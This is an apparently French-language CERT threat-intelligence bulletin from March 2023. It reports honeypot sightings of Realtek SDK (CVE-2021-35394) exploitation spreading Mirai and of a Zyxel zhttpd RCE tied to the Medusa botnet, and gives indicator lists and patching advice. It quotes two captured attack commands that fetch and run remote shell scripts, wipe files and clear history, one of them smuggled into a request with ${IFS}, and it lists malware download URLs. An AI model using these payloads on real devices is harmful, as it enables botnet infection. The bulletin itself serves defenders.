CERT

Notre sélection des alertes de nos honeypots : bulletin 5 – mars 2023

Une bonne compréhension des menaces actives est nécessaire pour adopter une bonne position de sécurité.  Le rapport suivant présente les tendances actuelles qui se dégagent du bruit de fond d’internet en se basant sur les données de deux dernières semaines de logs de nos Honeypots.

Exploitation d’une vulnérabilité dans SDK Realtek pour propager le botnet Mirai

Une vulnérabilité par injection de commande a été découverte en 2021 dans certaines versions de Realtek Jungle SDK. Elle permet à un attaquant non authentifié d’exécuter des commandes arbitraires sur le système affecté. Cette vulnérabilité est répertoriée sous la CVE-2021-35394 et a un score CVSSv3 de 9.8 (critique).

Les micropuces Realtek sont vendues et incluses dans divers produits IoT et routeurs de nombreux fabricants dans le monde entier.

Ces deux dernières semaines, une augmentation des tentatives d’exploitation de la CVE-2021-35394 a été observée sur nos honeypots dans le but de propager le botnet Mirai, un logiciel malveillant automatisé et auto-reproducteur.

22 adresses IP ont mené ces tentatives d’exploitation, ciblant des serveurs situés en Asie du Pacifique et en Europe (voir les IoCs ci-dessous). 80 % de ces tentatives d’exploitation proviennent d’adresses IP enregistrées aux États-Unis, 6 % aux Émirats Arabes Unis et 5 % au Viêtnam. Près de 80 % des demandes provenaient de l’AS211252 Delis LLC.

Répartition (%) des pays d’enregistrement des adresses IP
Répartition des adresses IP par AS

Si l’exploit réussit, l’attaquant utilise la requête suivante :

cd /tmp || cd /var/run || cd /mnt || cd /root || cd / ; wget <URL> ; chmod 777 * ; sh <filename1> ; tftp -g <adresse IP> -r <filename2> ; chmod 777 * ; sh <filename2> ; rm -rf *.sh ; history -c

Cette commande vise à :

  • Accéder à tmp, /var/run, /mnt, /root ou /
  • Télécharger <filename1> à partir de l’URL dédiée et l’exécuter à partir de basic shell
  • Télécharger et exécuter le <filename2>
  • Nettoyer le fichier temporaire et l’historique local

Les fichiers en question sont des variants de Mirai.

Vous trouverez ci-dessous les URLs contenus dans les requêtes web observées sur nos honeypots pour récupérer les fichiers malveillants:

URL contenue dans la requête webInformations complémentaires
http[:]//87.251.67[.]57/EkSgbins.sh http[:]//103.186.147[.]155/bins/mips http[:]//94.232.46[.]201/Sakura.sh http[:]//46.3.112[.]133:808/download.sh http://104.244.72.8/jack5tr.sh http[:]//170.64.182[.]9/bins/void.mpsl http[:]//45.154.3[.]16/mpsl http[:]//46.3.112[.]143/download.sh http[:]//46.3.112[.]162/download.sh http[:]//195.133.40[.]248/mpsl http[:]//111.92.242[.]146/mpsl
http[:]//107.189.13[.]143/download.sh http[:]//143.198.217[.]16/bins/mpsl http[:]//45.148.116[.]40/bins/mips http[:]//47.87.241[.]156/bins/kgf.mips http[:]//84.54.50[.]104/mips http[:]//79.137.198[.]58/hiddenbin/boatnet.mips http[:]//79.137.198[.]58/hiddenbin/boatnet.x86_64Ces URL sont connues pour avoir téléchargé un variant Linux de Mirai.
http://43.139.138[.]38/mpsl http://109.206.240[.]148/bins/mp http[:]//64.93.80[.]146/mpsl http[:]//109.206.240[.]231/binS/botx.mpslURL indisponible à la rédaction

Ces attaques à grande échelle sont préoccupantes pour les organisations, car les IoTs et les routeurs sont souvent négligés en matière de cybersécurité. Ces détections s’alignent sur les observations récentes de la communauté cyber concernant une augmentation notable d’attaques contre les produits Realtek.

Pour prévenir de telles attaques, il est important d’appliquer les mises à jour du fournisseur dès qu’elles sont disponibles. Un outil de sécurité tel que TEHTRIS NTA vous aidera à détecter toute compromission de vos appareils.   

IoCs – Adresses IP

  • 109.206.240[.]231
  • 185.117.74[.]19
  • 103.90.160[.]10
  • 103.180.147[.]228
  • 84.54.50[.]104
  • 14.225.254[.]162
  • 109.206.240[.]9
  • 107.189.12[.]152
  • 178.128.25[.]126
  • 167.172.175[.]228
  • 185.225.73[.]104
  • 107.189.29[.]121
  • 185.221.162[.]49
  • 107.189.1[.]237
  • 193.35.18[.]109
  • 170.64.174[.]2
  • 194.87.151[.]204
  • 178.128.122[.]209
  • 194.113.194[.]43
  • 77.91.78[.]10
  • 45.128.232[.]11
  • 87.121.221[.]104

Exploitation d’une vulnérabilité RCE dans le produit Zyxel

Une vulnérabilité à haut risque, divulguée fin 2020 , affecte les produits Zyxel et permet à un attaquant d’exécuter du code arbitraire à distance. La vulnérabilité est due à un traitement inadéquat des requêtes HTTP dans le serveur web zhttpd. Zyxel est un fabricant taïwanais de modems, de commutateurs réseau, de routeurs et de points d’accès Wi-Fi, entre autres.

Les cyberattaquants s’appuient toujours sur cet exploit et parcourent internet à la recherche d’appareils vulnérables. Au cours des deux dernières semaines, une requête web unique provenant de plus de 80 adresses IP a été observée :

/bin/zhttpd/${IFS}cd${IFS}/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http[ :]//163.123.143.126/x.sh;${IFS}sh${IFS}x.sh ;

L’attaquant cherche à supprimer ce qui se trouve dans le fichier tmp et à télécharger puis exécuter le binaire x.sh à partir de l’URL http[ :]//163.123.143[.]126/x.sh.  Le fichier correspond au SHA256 945196525c4b0a14709f68b2751811d3991265c22d5018b5941207414f95985d , vu pour la première fois en décembre 2022 et potentiellement associé au botnet Linux Medusa. Le botnet Medusa existe depuis des années, et une nouvelle variante a été repérée, basée sur une fuite du code source du botnet Mirai.

1/4 des tentatives d’exploitation proviennent d’adresses IP enregistrées en Chine, les autres principaux pays d’origine étant l’Inde, l’Ukraine, la Suède et l’Australie. 

Réparation (%) des pays d’origine des adresses IP

Pour éviter qu’un appareil Zyxel ne soit ajouté à un botnet, il est impératif de mettre à jour les versions dès que le fournisseur publie des correctifs.

Ce sujet vous intéresse ?

Recevez plus d’informations sur ce bulletin des alertes révélées par nos honeypots.

Abonnez-vous à notre newsletter threat intelligence bimensuelle !


    Information remain TEHTRIS sole property and reproduction is forbidden

    TEHTRIS is and remains sole property rights owner of the information provided herein. Any copy, modification, derivative work, associated document, as well as every intellectual property right, is and must remain TEHTRIS’ sole and exclusive property. TEHTRIS authorizes the user to access for read use only. Except as expressly provided above, nothing contained herein will be construed as conferring any license or right under any TEHTRIS’ copyright.

    No warranty and liability

    TEHTRIS will not be held liable for any use, improper or incorrect use of the information described and/or contained herein and assume no responsibility for anyone’s use of the information. Although every effort has been made to provide complete and accurate information, TEHTRIS makes no warranty, expressed or implied regarding accuracy, adequacy, completeness, legality, reliability, or usefulness of any information provided herein. This disclaimer applies to both isolated and aggregated uses of the information.